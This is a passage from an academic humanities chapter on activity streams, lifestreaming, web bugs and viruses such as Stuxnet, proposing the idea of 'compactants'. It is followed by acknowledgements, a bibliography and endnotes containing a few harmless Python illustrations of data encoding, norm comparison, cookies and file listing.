that is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams, n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- 'Geraldine posted a photo to her album' or 'John shared a video'. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
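To make this encoding concrete, the following minimal sketch shows the activity from the quotation expressed as a data structure in Python; the field names follow the JSON Activity Streams 1.0 specification cited above, while the values are hypothetical: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# A minimal sketch of an activity in the actor/verb/object/target form;
# field names follow JSON Activity Streams 1.0, values are hypothetical.
import json

activity = {
    'actor': {'objectType': 'person', 'displayName': 'Geraldine'},
    'verb': 'post',
    'object': {'objectType': 'photo', 'url': 'http://example.org/photos/1'},
    'target': {'objectType': 'photo-album', 'displayName': 'Holiday 2011'},
    'published': '2011-02-10T15:04:55Z',
}

# serialised this way, the event can be transmitted, aggregated,
# searched and processed computationally
print(json.dumps(activity, indent=2))
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;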
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and the aggregative use case, in other words for the individual user (or lifestreamer) and for the organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class of others (see the sketch at the end of this section).[13]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also in terms of offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational 'care of the self', facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that make the data make sense. The code and software are therefore responsible for creating and maintaining meaning and narratives for the actor through a stabilised web of meaning.[14]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
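Before turning to the conclusions, the kind of norm comparison described above can be made concrete in a few lines of Python. This is a minimal illustration with hypothetical numbers, not any particular service's method: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# A minimal sketch of comparing a lifestreamer's latest data-point
# against their own historical norm; the numbers are hypothetical.
import statistics

history = [8200, 7900, 10400, 6100, 9300, 8800, 7600]  # daily step counts
today = 3200

mean = statistics.mean(history)
stdev = statistics.stdev(history)
z = (today - mean) / stdev

# the same comparison could equally be made against a population,
# group, or class of others rather than the personal baseline
print(f'today is {z:+.1f} standard deviations from the personal norm')
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;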
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed very productive knowledge can be generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand such software ecologies (Berry, 2011).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers and carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, create the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions, particularly in relation to the complexity and obfuscated nature of the code and its ability to track and collect data surreptitiously. However, users are actively downloading apps that advertise the fact that they collect this data, and seem genuinely to find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs are in many ways life streams - albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' is designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to draw particular attention to this passive-aggressive feature of computational agents that collect information: passive in the sense of lying under the surface, relatively benign and silent, but aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and of conciseness in expression. The etymology, from the Latin ''compactus'', closely put together or joined together, also neatly expresses the sense of what web bugs and related technologies are. That is, compactants are interesting in terms of the distributed agency they enable, which can be understood through the notion of ''companion actants'' (see Haraway, 2003).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that are often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. 
Within the quantified-self movement there is an explicit recognition that the 'future self' will be required to undo bad habits and behaviours of the present self. That is, there is an explicit normative context to a ''future'' self, whom you, as the ''present'' self, may be treating unfairly, immorally or without due regard to what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal representation of time within computational systems, that is, time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; There are many examples of how attending to the code and software that structure many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights, both into our usage of code and software and into the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not been fully incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attest. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to critical theorists, both of the present, looking to provide critique and counterfactuals, and ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106, which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: the PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; the ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; the Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium, organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'', organised by Ina Blom, University of Oslo. I would also like to express my deepest thanks to Michael Najjar for his kind permission to use his work, 'The sublime brain [of Jonathon]', which represents a neuronal frontal portrait of an individual, for the cover of the book; for more of his excellent work please see [http://www.michaelnajjar.com]. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) 'Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;', ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) 'Stuxnet: Computer worm opens new era of warfare', ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) 'Activity Streams', accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) 'JSON Activity Streams 1.0', Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) 'Iran says Stuxnet virus infected 16,000 computers', ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) 'European Watchdog Pushes for Do Not Track Protocol', accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) 'Iran Confirms Stuxnet Worm Halted Centrifuges', ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) 'How Stuxnet Is Rewriting the Cyberterrorism Playbook', ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) 'Stuxnet Myrtus or MyRTUs?', accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) 'A Life Lived in Media', ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) 'Privacy Effects of Web Bugs Amplified by Web 2.0', in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) 'Counting every moment', ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) 'The Web Bug FAQ', accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) 'Duqu Trojan used 'unknown' programming language: Kaspersky', CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) 'How HP bugged e-mail', accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) 'How To Manufacture&amp;amp;nbsp;Desire', ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Frabetti, F. (2010) 'Critical Code Studies', accessed 15/03/2012, http://vimeo.com/16263212 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) 'Dunn grilled by Congress', accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) 'The Lifestreams Software Architecture', Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) 'Welcome to the Yale Lifestreams homepage!', accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) 'Americans Love Google! Americans Hate Google!', ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) 'The cyber-road not taken.', ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) 'Time To Start Taking The Internet Seriously', ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) 'The Many Data Hats a Company can Wear', accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) 'Ghostrank Planetary System', accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) 'About Ghostery', accessed 02/03/2012, http://www.ghostery.com/about &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) 'About ChartBeat', accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) 'Stuxnet/Duqu: The Evolution of Drivers', SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) 'A Declaration of Cyber-War', ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hall, G. (2011) ''Digitize Me, Visualize Me, Search Me'', Open Humanities Press, accessed 02/03/2012, http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Haraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) 'Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis', ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet worm targets companies in Europe', ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) 'Stuxnet opens cracks in Iran nuclear program', accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) 'Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon', accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2012) 'Display Advertising Technology Landscape', accessed 02/06/2012, http://www.lumapartners.com/resource-center/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) 'I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web', ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. E. (2010) 'In a Computer Worm, a Possible Biblical Clue', ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) 'Stuxnet Under the Microscope', accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) 'The Importance of Philosophy to Engineering', ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) 'User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web', Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) 'The Stuxnet Sting', accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Parikka, J. (2012) ''Medianatures: The Materiality of Information Technology and Electronic Waste'', Open Humanities Press, accessed 01/06/2012, http://www.livingbooksaboutlife.org/books/Medianatures &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Parry, D. (2011) ''Ubiquitous Surveillance'', Open Humanities Press, http://www.livingbooksaboutlife.org/books/Ubiquitous_Surveillance &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) 'Langner’s Stuxnet Deep Dive S4 Video', accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) 'Search Engine Use 2012', accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) 'So What Do We Do With All This Data?', ''The Smithsonian'', accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sanger, D. E. (2012) 'Obama Order Sped Up Wave of Cyberattacks Against Iran', ''The New York Times'', June 1, 2012, accessed 02/06/2012, http://www.nytimes.com/2012/06/01/world/middleeast/obama-ordered-wave-of-cyberattacks-against-iran.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) 'Feel. Act. Make sense', accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) 'Bad Habits? My Future Self Will Deal With That', accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wauters, R. (2012) '427 million Europeans are now online, 37% uses more than one device: IAB', ''The Next Web'', accessed 01/06/2012, http://thenextweb.com/eu/2012/05/31/427-million-europeans-are-now-online-37-uses-more-than-one-device-iab/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) 'Tracking Protection Working Group', accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) 'The Personal Analytics of My Life', accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) 'CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth', ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) 'Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target', ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) 'Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant', ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies, Locally Stored Objects (LSOs) and Document Object Model storage (DOM storage). &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal, 2010: 10). &lt;br /&gt;
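By way of illustration, this state mechanism can be sketched with the Python standard library; the identifier below is hypothetical: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# A minimal sketch of cookie-based state: the server sets a small piece
# of named state, which the browser returns on every later request.
from http.cookies import SimpleCookie

# server side: set a cookie on the first response
cookie = SimpleCookie()
cookie['uid'] = 'af1c-9920'          # hypothetical visitor identifier
cookie['uid']['max-age'] = 31536000  # persist for a year
print(cookie.output())  # Set-Cookie: uid=af1c-9920; Max-Age=31536000

# client side: the browser echoes the value back until the cookie
# expires or is reset by the server
returned = SimpleCookie('uid=af1c-9920')
print(returned['uid'].value)  # af1c-9920
&amp;lt;/pre&amp;gt; &lt;br /&gt;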
&lt;br /&gt;
[3] Ghostery describes itself on its help page: 'Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity' (Ghostery, 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. It does this by exploiting the file or information transport features on a computer, such as its networking setup, which allow it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and careful analysis of the internal data structures and finite state machine used to structure the attack. Ironically, Ralph Langner then matched this against photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, confirming the importance of the cascade structure, centrifuge layout and the enriching process through careful analysis of background images accidentally photographed on computers used by the president; see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was 03/02/2010 (Matrosov et al., n.d.), although there is suspicion that there may be three versions of the Stuxnet code: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] There are, however, some criticisms that this link may be spurious. For instance, Cryptome (2010) argues that the 'myrtus' string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; may stand for &amp;quot;My-RTUs&amp;quot;, as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
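The filesystem 'archeology' Wolfram describes can be sketched in a few lines of Python; this is my own minimal illustration, not Wolfram's code: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# A minimal sketch of filesystem archeology: list the files in a tree
# that have gone longest without modification.
import os
import time

def oldest_files(root, count=10):
    ages = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in filenames:
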